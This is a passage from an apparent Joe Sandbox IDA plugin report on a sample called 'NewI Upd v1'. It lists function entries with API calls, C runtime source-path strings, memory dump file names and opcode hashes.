                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___vcrt_getptd$ExceptionObject$DestroyedDestruct
                                                                                  • String ID: csm
                                                                                  • API String ID: 485384042-1018135373
                                                                                  • Opcode ID: ad5bf6b98acdde439386ae22eee25e0f183f6591016c5cf2e2ff964758da6738
                                                                                  • Instruction ID: 94084295eaa3e2ffae959e2ae56ad5af02cb7e0dcdf82b146bbbd5a7a6e1cdf3
                                                                                  • Opcode Fuzzy Hash: ad5bf6b98acdde439386ae22eee25e0f183f6591016c5cf2e2ff964758da6738
                                                                                  • Instruction Fuzzy Hash: 0421FC74900208DFCF18EF98D0986AA7B7AFF55305F548258E419DB252DB34DA86CB92
                                                                                  APIs
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 0089F0EF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: TimevecTimevec::_std::_
                                                                                  • String ID: %ls$_fileno$minkernel\crts\ucrt\src\appcrt\stdio\fileno.cpp$stream.valid()
                                                                                  • API String ID: 4219598475-3741990651
                                                                                  • Opcode ID: 22753c50010fc12bdbee0a0a67c2f25ad3dcace7a39710326542960e57714cbd
                                                                                  • Instruction ID: 5d61adaac3647e409da38ab85fe3deee940968f5d1c7b705dcd437f3a6b34446
                                                                                  • Opcode Fuzzy Hash: 22753c50010fc12bdbee0a0a67c2f25ad3dcace7a39710326542960e57714cbd
                                                                                  • Instruction Fuzzy Hash: 4901D230E8430CFADF29BA84CC42BED7B60FB50718F244264F215E62D3C7B45A4486C6
                                                                                  APIs
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 0087E6B3
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 0087E6C7
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 0087E6D7
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 0087E6E2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___vcrt_getptd
                                                                                  • String ID: csm
                                                                                  • API String ID: 984050374-1018135373
                                                                                  • Opcode ID: e98f0f87cc11f5f3536577ba016a0ce25959a303e9a11200642eef1b5e6cebc9
                                                                                  • Instruction ID: c83ce9c2c51969c4510ea54224078ae0c784dbbfa2e274c280595f17ecfe1b21
                                                                                  • Opcode Fuzzy Hash: e98f0f87cc11f5f3536577ba016a0ce25959a303e9a11200642eef1b5e6cebc9
                                                                                  • Instruction Fuzzy Hash: D011E278A04208EFCB04EFA8C1455ADBBB1FF58314B5089E9D819EB315D734EA80DB82
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(0087F107,00000000,00000800,?,?,0087F107,00000000), ref: 0087F20F
                                                                                  • GetLastError.KERNEL32(?,?,0087F107), ref: 0087F223
                                                                                  • _wcsncmp.LIBCMTD ref: 0087F239
                                                                                  • LoadLibraryExW.KERNEL32(0087F107,00000000,00000000,?,0087F107), ref: 0087F24D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast_wcsncmp
                                                                                  • String ID: api-ms-
                                                                                  • API String ID: 4169583555-2084034818
                                                                                  • Opcode ID: 7f185bf5b48930967ee98ea108175b8cdc5780a85c514aef69d6f06fbe04934f
                                                                                  • Instruction ID: 4be47afd19ee2096d9dd957a241531983d6fe1a2e00f9271c6ef4f7d2e2721e3
                                                                                  • Opcode Fuzzy Hash: 7f185bf5b48930967ee98ea108175b8cdc5780a85c514aef69d6f06fbe04934f
                                                                                  • Instruction Fuzzy Hash: 21F09038A50208FBEB00DBA1EC0AB697768FB45704F10C0A0FB08DB183D774EA009790
                                                                                  APIs
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 00884374
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 008843BD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: TimevecTimevec::_std::_
                                                                                  • String ID: $minkernel\crts\ucrt\src\appcrt\startup\onexit.cpp
                                                                                  • API String ID: 4219598475-1215429239
                                                                                  • Opcode ID: 8bda16532e983493ff7a5533a1403aa4d014535df09b2514d1d736e06222902e
                                                                                  • Instruction ID: ab7fe5f88f2eb4fbafbbc53c8d6a43ed748fd70a983849dc8dfe20ca81af26bf
                                                                                  • Opcode Fuzzy Hash: 8bda16532e983493ff7a5533a1403aa4d014535df09b2514d1d736e06222902e
                                                                                  • Instruction Fuzzy Hash: 1581C5B5E002099FDB04EFA8D881AAEBBB1FF48304F208169E515BB351D735AA41CF91
                                                                                  APIs
                                                                                    • Part of subcall function 008974F0: GetOEMCP.KERNEL32(00000000), ref: 00897525
                                                                                  • __wcstombs_l.LIBCMTD ref: 00897A85
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 00897A91
                                                                                  Strings
                                                                                  • minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp, xrefs: 00897A79
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: TimevecTimevec::___wcstombs_lstd::_
                                                                                  • String ID: minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp
                                                                                  • API String ID: 2681442900-426720447
                                                                                  • Opcode ID: 403fb741a81373c539740331da8bfc435edd99f234f2e0286dbff9b49d58168c
                                                                                  • Instruction ID: 85d4af48694232fa2f6b1fef2e18a8df84736b4ffa9369e2a61c30cd2faf3425
                                                                                  • Opcode Fuzzy Hash: 403fb741a81373c539740331da8bfc435edd99f234f2e0286dbff9b49d58168c
                                                                                  • Instruction Fuzzy Hash: 1D5163719142059BCF18EF68C882AAE77B4FF54321F144258E911EB2D6EB31ED05CBA1
                                                                                  APIs
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 008839C0
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,00000000,4903A6BA), ref: 008839D5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModuleTimevecTimevec::_std::_
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 2070146554-1276376045
                                                                                  • Opcode ID: f75b63ed7754192ea0498c25e0ba226ca40e6600c60eea22a269d1bc2e0b6c7a
                                                                                  • Instruction ID: 44026692283563043c33054cc9ade4e77985b79a22fd6050f5ff4bfab1f75acb
                                                                                  • Opcode Fuzzy Hash: f75b63ed7754192ea0498c25e0ba226ca40e6600c60eea22a269d1bc2e0b6c7a
                                                                                  • Instruction Fuzzy Hash: 40113A7091451ADBCB14FFA8CC46AAEB7B8FF14B10F000529A526E3691EB34AA058B91
                                                                                  APIs
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 008A5486
                                                                                  Strings
                                                                                  • public_stream != nullptr, xrefs: 008A545C
                                                                                  • minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp, xrefs: 008A546A
                                                                                  • %ls, xrefs: 008A5461
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: TimevecTimevec::_std::_
                                                                                  • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp$public_stream != nullptr
                                                                                  • API String ID: 4219598475-1254537880
                                                                                  • Opcode ID: 1889e61c96f66056d7d26ec9d0c39bd0860f245a9e2bd430473612d035d2d467
                                                                                  • Instruction ID: af0ff36363d9918ed623880c698ca2f554622a7092fcb41efb430f82441b2b23
                                                                                  • Opcode Fuzzy Hash: 1889e61c96f66056d7d26ec9d0c39bd0860f245a9e2bd430473612d035d2d467
                                                                                  • Instruction Fuzzy Hash: 4111CE70811208EAEB04FB94C857BED73A4FF21704F904058A5059A592EBB09B84D792
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustPointer
                                                                                  • String ID:
                                                                                  • API String ID: 1740715915-0
                                                                                  • Opcode ID: 2d6a2575b6fc7f255cf0689b32a77e7f43749fa533fbc3c1dc813909b6d0a2da
                                                                                  • Instruction ID: 75f5f210c84eaf49cbd5b661e5697647231897682e99a46b2939a10709938437
                                                                                  • Opcode Fuzzy Hash: 2d6a2575b6fc7f255cf0689b32a77e7f43749fa533fbc3c1dc813909b6d0a2da
                                                                                  • Instruction Fuzzy Hash: E2912A74A00209CFCB04DF98D884BAEB7B1FB49308F248169E8159B395CB35EC85CFA1
                                                                                  APIs
                                                                                  • GetCPInfo.KERNEL32(0000FDE9,?), ref: 008976C3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Info
                                                                                  • String ID: $z
                                                                                  • API String ID: 1807457897-2251613814
                                                                                  • Opcode ID: 00b3414fcc32920ab64507275a7014dd7339ab6c553a5b45b365e6a4baf42adc
                                                                                  • Instruction ID: 2f8ef3d9a19feed2e7a9712930cee64f7284a0cc24f6f08bc32632421805cf75
                                                                                  • Opcode Fuzzy Hash: 00b3414fcc32920ab64507275a7014dd7339ab6c553a5b45b365e6a4baf42adc
                                                                                  • Instruction Fuzzy Hash: 26A13D74A5C25C9BDF15DF48C891BE9BB71FF44308F1880D9D94D9B282C278AA91CF94
                                                                                  APIs
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 00896B98
                                                                                  Strings
                                                                                  • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 00896B81, 00896C16
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: TimevecTimevec::_std::_
                                                                                  • String ID: minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
                                                                                  • API String ID: 4219598475-2801755846
                                                                                  • Opcode ID: dd2cfb7d256944f1d14587b8c8285508fe5c1bd868e332a4da96da57a6f0c754
                                                                                  • Instruction ID: 897cc15e7eccb36a74d2bd44e5ece62bf155cfad741fb8f2dda7749de0f0bd14
                                                                                  • Opcode Fuzzy Hash: dd2cfb7d256944f1d14587b8c8285508fe5c1bd868e332a4da96da57a6f0c754
                                                                                  • Instruction Fuzzy Hash: 3B411E74E00109EFDB14EF98C581EAEB7B1FF54304F648598E515AB391EB30AE51DB80
                                                                                  Strings
                                                                                  • D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp, xrefs: 0087EBD9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
                                                                                  • API String ID: 0-277556848
                                                                                  • Opcode ID: 9f932460e5eb50291b03e0c7eebdbf0b5afa75688a92038aaa5cad8a94bbf409
                                                                                  • Instruction ID: 002a155554cee142f11171ab849e237099af01f90f1b2a9316134326ef94b90a
                                                                                  • Opcode Fuzzy Hash: 9f932460e5eb50291b03e0c7eebdbf0b5afa75688a92038aaa5cad8a94bbf409
                                                                                  • Instruction Fuzzy Hash: 84313674D10108DACB04EBA8DC82BEDB774FB28318F5485F4E51AE6296EB34DE05DB52
                                                                                  APIs
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 0089F1CD
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 0089F217
                                                                                    • Part of subcall function 0089AF30: InitializeCriticalSectionEx.KERNEL32(?,?,?,?,008988D5,-008C1A89,00000FA0,00000000), ref: 0089AF41
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: TimevecTimevec::_std::_$CriticalInitializeSection
                                                                                  • String ID: minkernel\crts\ucrt\src\appcrt\stdio\_file.cpp
                                                                                  • API String ID: 902273576-1882378938
                                                                                  • Opcode ID: b5983d9b09c68881500fb6e852fd489df09c6120bf509f4c9eab94d6559eeeda
                                                                                  • Instruction ID: 49bc15c4c7ecaa98de2bb1bff523f839902b7127becfec73607fa268a4526841
                                                                                  • Opcode Fuzzy Hash: b5983d9b09c68881500fb6e852fd489df09c6120bf509f4c9eab94d6559eeeda
                                                                                  • Instruction Fuzzy Hash: C641A475A04304ABCF28EFA8DC8AFAD7B70FB51314F184269D612E62E3D7B45A44CB45
                                                                                  APIs
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 0087E5BE
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 0087E5D2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___vcrt_getptd
                                                                                  • String ID: csm
                                                                                  • API String ID: 984050374-1018135373
                                                                                  • Opcode ID: e2b09092fee05a908b510c42ed20633341b7a21a3910ae2c3f6aff4892acc549
                                                                                  • Instruction ID: 235fc31b89fe1d25d402292a272744c11cd1d9c551c1100e5d4e7c95c7e88187
                                                                                  • Opcode Fuzzy Hash: e2b09092fee05a908b510c42ed20633341b7a21a3910ae2c3f6aff4892acc549
                                                                                  • Instruction Fuzzy Hash: EA01A938900208DF8B18DF65D151869BBB6FF48315B6481D8D44A9F359E731EF41DB91